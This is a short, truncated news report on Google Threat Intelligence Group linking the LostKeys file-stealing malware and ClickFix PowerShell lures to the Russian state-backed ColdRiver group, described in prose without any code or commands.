Google links new LostKeys data theft malware to Russian cyberspies

Since the start of the year, the Russian state-backed ColdRiver hacking group has been using new LostKeys malware to steal files in espionage attacks targeting Western governments, journalists, think tanks, and non-governmental organizations. In December, the United Kingdom and Five Eyes allies linked ColdRiver to Russia's Federal Security Service (FSB), the country's counterintelligence and internal security service. Google Threat Intelligence Group (GTIG) first observed LostKeys being "deployed in highly selective cases" in January as part of ClickFix social engineering attacks, where the threat actors trick targets into running malicious PowerShell scripts. Running these scripts downloads and executes additional PowerShell payloads on the victims' devices, ending with a Visual Basic Script (VBS) data theft malware tracked by Google as LostKeys. "LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and r ... Read full article.